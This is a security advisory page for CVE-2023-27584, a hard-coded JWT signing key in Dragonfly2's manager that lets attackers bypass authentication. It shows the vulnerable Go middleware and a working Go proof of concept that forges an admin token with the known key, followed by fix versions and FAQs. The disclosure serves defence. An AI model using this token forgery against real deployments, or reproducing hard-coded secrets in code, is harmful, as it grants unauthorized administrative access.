critical
9.8
CWE
321 798
Advisory Published
CVE Published
Updated

CVE-2023-27584: Dragonfly2 vulnerable to hard coded cyptographic key

First published: Thu Sep 19 2024(Updated: )

### Summary Hello dragonfly maintainer team, I would like to report a security issue concerning your JWT feature. ### Details Dragonfly uses [JWT](https://github.com/dragonflyoss/Dragonfly2/blob/cddcac7e3bdb010811e2b62b3c71d9d5c6749011/manager/middlewares/jwt.go) to verify user. However, the secret key for JWT, "Secret Key", is hard coded, which leads to authentication bypass ```go authMiddleware, err := jwt.New(&jwt.GinJWTMiddleware{ Realm: "Dragonfly", Key: []byte("Secret Key"), Timeout: 2 * 24 * time.Hour, MaxRefresh: 2 * 24 * time.Hour, IdentityKey: identityKey, IdentityHandler: func(c *gin.Context) any { claims := jwt.ExtractClaims(c) id, ok := claims[identityKey] if !ok { c.JSON(http.StatusUnauthorized, gin.H{ "message": "Unavailable token: require user id", }) c.Abort() return nil } c.Set("id", id) return id }) ``` ### PoC Use code below to generate a jwt token ```go package main import ( "errors" "fmt" "time" "github.com/golang-jwt/jwt/v4" ) func (stc *DragonflyTokenClaims) Valid() error { // Verify expiry. if stc.ExpiresAt <= time.Now().UTC().Unix() { vErr := new(jwt.ValidationError) vErr.Inner = errors.New("Token is expired") vErr.Errors |= jwt.ValidationErrorExpired return vErr } return nil } type DragonflyTokenClaims struct { Id int32 `json:"id,omitempty"` ExpiresAt int64 `json:"exp,omitempty"` Issue int64 `json:"orig_iat,omitempty"` } func main() { signingKey := "Secret Key" token := jwt.NewWithClaims(jwt.SigningMethodHS256, &DragonflyTokenClaims{ ExpiresAt: time.Now().Add(time.Hour).Unix(), Id: 1, Issue: time.Now().Unix(), }) signedToken, _ := token.SignedString([]byte(signingKey)) fmt.Println(signedToken) } ``` And send request with JWT above , you can still get data without restriction. <img width="1241" alt="image" src="https://user-images.githubusercontent.com/70683161/224255896-8604fa70-5846-4fa0-b1f9-db264c5865fe.png"> ### Impact An attacker can perform any action as a user with admin privileges.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
go/d7y.io/dragonfly/v2<2.1.0-beta.1
2.1.0-beta.1
D7y Dragonfly Go<2.0.9
Linuxfoundation Dragonfly Go<2.0.9

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2023-27584?

    CVE-2023-27584 is classified as a high-severity vulnerability affecting the JWT feature in Dragonfly.

  • How do I fix CVE-2023-27584?

    To mitigate CVE-2023-27584, upgrade Dragonfly to version 2.1.0-beta.1 or later.

  • Which versions of Dragonfly are affected by CVE-2023-27584?

    CVE-2023-27584 affects Dragonfly versions prior to 2.1.0-beta.1 and also versions before 2.0.9.

  • What impact does CVE-2023-27584 have on Dragonfly?

    CVE-2023-27584 could allow an attacker to exploit vulnerabilities related to the JWT verification process.

  • Is there a specific component in Dragonfly that CVE-2023-27584 targets?

    CVE-2023-27584 specifically targets the JWT middleware component used in Dragonfly.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203